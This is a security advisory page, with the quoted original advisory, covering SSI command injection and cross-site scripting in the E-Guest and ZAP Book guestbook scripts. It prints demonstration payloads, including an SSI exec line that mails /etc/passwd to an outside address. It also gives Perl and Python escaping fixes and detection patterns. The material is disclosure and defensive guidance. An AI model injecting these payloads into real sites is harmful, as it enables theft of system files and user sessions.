SecurityTracker.com
SecurityTracker
Archives


 


Category:   Application (Generic)  >   E-Guest Vendors:   Leung, Eric
E-Guest Guestbook CGI Script Input Validation Hole Lets Remote Users Execute Shell Commands on the System and Also Conduct Cross-Site Scripting Attacks Against E-Guest Users
SecurityTracker Alert ID:  1004663
SecurityTracker URL:  http://securitytracker.com/id/1004663
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 1 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.1
Description:   A vulnerability was reported in the E-Guest guestbook CGI script. A remote user can execute arbitrary shell commands on the system and can conduct cross-site scripting attacks against E-Guest users.

DownBload Security Research Lab issued an advisory warning of vulnerabilities in E-Guest. According to the report, the software does not filter the name, email, homepage, and location fields, allowing a remote user to submit malicious server-side include (SSI) directives or arbitrary scripting code.

After submitting malicious SSI, the remote user can view the guestbook to cause the SSI code to be executed by the server with the privileges of the web server.

A demonstration exploit is provided:

Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->

A remote user can also submit malicious script that, when viewed by a target user, will cause the script to be executed by the target user's browser. The code will run in the security context of the web site running E-Guest. As a result, the code will be able to access the target user's cookies associated with that site (if any), access data submitted by the target user to the web site via web form (if any), and take actions on the web site acting as the target user.

A demonstration exploit is provided:

Full Name: HI&lt;script&gt;javascript:alert('HACKED BY DOWNBLOAD');&lt;/script&gt;

Impact:   A remote user can execute arbitrary shell commands (via SSI) on the server with the privileges of the web server.

A remote user can conduct cross-site scripting attacks against a target user to access the target user's cookies associated with that site (if any), access data submitted by the target user to the web site via web form (if any), and take actions on the web site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.leungeric.com/share/getfile.php?E-Guest
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  Perl-based
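The escaping fix the advisory proposes, reworked here as an added Python example (not E-Guest's code and not the advisory author's): it transcribes the advisory's `<`/`>`-only substitution as `minimal_fix`, contrasts it with full HTML escaping that also covers `&` and quotes (needed if a field such as homepage is placed inside an attribute, which is assumed here), and includes an audit helper that flags SSI directives and script tags in entries already stored. The two sample payloads are constructed from the ones shown on this page.

```python
import html
import re

# Constructed sample submissions modelled on the advisory's two payloads
# (the page shows the XSS one entity-encoded; this is the raw form).
SSI_PAYLOAD = 'HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->'
XSS_PAYLOAD = "HI<script>javascript:alert('HACKED BY DOWNBLOAD');</script>"

# Apache's SSI parser acts on a literal "<!--#directive"; a script tag
# needs a literal "<script". These patterns are used only to audit stored
# entries, not to sanitize input (blocklists are bypassable; escape instead).
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*\w+", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def minimal_fix(value: str) -> str:
    """The advisory's own fix, transcribed from its Perl substitutions:
    only < and > are replaced. Enough to neutralize SSI and element-text
    XSS, but quotes survive."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def escape_field(value: str) -> str:
    """Full HTML escaping: & < > " and ' are all encoded, so the value is
    safe as element text and inside a quoted attribute (assumed here for
    the homepage field rendered as a link)."""
    return html.escape(value, quote=True)


def sanitize_entry(entry: dict) -> dict:
    """Escape every submitted field; E-Guest filtered only 'comment'."""
    return {field: escape_field(text) for field, text in entry.items()}


def find_active_content(text: str) -> list:
    """Audit helper for an existing guestbook file: list which kinds of
    active content are present in the text exactly as stored."""
    found = []
    if SSI_DIRECTIVE.search(text):
        found.append("ssi-directive")
    if SCRIPT_TAG.search(text):
        found.append("script-tag")
    return found


if __name__ == "__main__":
    for raw in (SSI_PAYLOAD, XSS_PAYLOAD):
        print(find_active_content(raw), "->", find_active_content(escape_field(raw)))
```

Escaping at the application layer is the fix; on Apache, serving the guestbook page with `IncludesNOEXEC` instead of `Includes` additionally disables the `#exec` directive regardless of what is stored.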

Message History:   None.


 Source Message Contents

Subject:  SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)





 	      [ DownBload Security Research Lab Advisory ]
[-------------------------------------------------------------------------]
Advisory name: SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)
Advisory number: 6
Application: E-Guest (1.1) & ZAP Book (v1.0.3) (CGI scripts)
---[ E-Guest 
Author: Leung Eric
E-mail: cgi@leungeric.com
Homepage: http://leungeric.com
Working demo: http://leungeric.com/eric/demo/E-Guest_sign.pl
---[ ZAP Book
Author: Sephiroth32
E-mail: sephiroth32@unitedff.com
Homepage: http://www.unitedff.com

Date: 28.06.2002
Impact: remote user can execute shell commands & cross site scripting 
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: downbload@hotmail.com




======[ Overview

--[ E-Guest is "...full feature guestbook written in Perl...".
    Maybe a little too much 'full feature' ;).
--[ ZAP Book is a guestbook too, but it is more advanced than E-Guest.




======[ Problem

It looks like it is very hard to find a secure guestbook. ;)
--[ The E-Guest author wrote "HTML tag filtering". That is true, but only
    'comment' is filtered, and there are still name, email, homepage and
    location, where we can put our nasty SSI or CSS code.
--[ ZAP Book is a different animal. In ZAP Book, almost everything is
    filtered. The exception is the 'post' variable, which contains the user
    comment, so again we can put our nasty SSI or CSS code in the 'post' variable.




======[ Examples

---[ E-Guest

SSI attack
~~~~~~~~~~
Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
E-mail: downbload@hotmail.com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just SSI attack.

CSS attack
~~~~~~~~~~
Full Name: HI&lt;script&gt;javascript:alert('HACKED BY DOWNBLOAD');&lt;/script&gt;
E-mail: downbload@hotmail.com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just CSS attack.


---[ ZAP Book

SSI attack
~~~~~~~~~~
Name: DownBload
Email: downbload@hotmail.com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: SSI attack <!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->

CSS attack
~~~~~~~~~~
Name: DownBload
Email: downbload@hotmail.com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: CSS attack &lt;script&gt;javascript:alert('HACKED BY DOWNBLOAD');&lt;/script&gt;




======[ Solution

As I said in the 'Makebook advisory', the solution for SSI & CSS attacks is
filtering special characters from user input.

---[ E-Guest
FIX: Add the following code to E-Guest_sign.pl (or wait for a fixed version :-):
...
# Replace angle brackets with HTML entities in every unfiltered field,
# so stored values are rendered as text rather than parsed as SSI or HTML.
$fullname =~ s/</&lt;/g;
$fullname =~ s/>/&gt;/g;

$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;

$homepage =~ s/</&lt;/g;
$homepage =~ s/>/&gt;/g;

$uin =~ s/</&lt;/g;
$uin =~ s/>/&gt;/g;

$location =~ s/</&lt;/g;
$location =~ s/>/&gt;/g;
...


---[ ZAP Book
FIX: Add the following code to addentry.cgi (or wait for a fixed version :-):
...
# The 'post' variable is the only one ZAP Book leaves unfiltered.
$in{'post'} =~ s/</&lt;/g;
$in{'post'} =~ s/>/&gt;/g;
...




======[ Greetz

Greetz goes to #hr.hackers <irc.carnet.hr>. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, 
Fr1c, harlequin, Astral and www.active-security.org.
Special shitz goes to: DarkMan from crohack a.k.a darkforum, and his 
stupid friend h4x0r.
		

 
 


Copyright 2021, SecurityGlobal.net LLC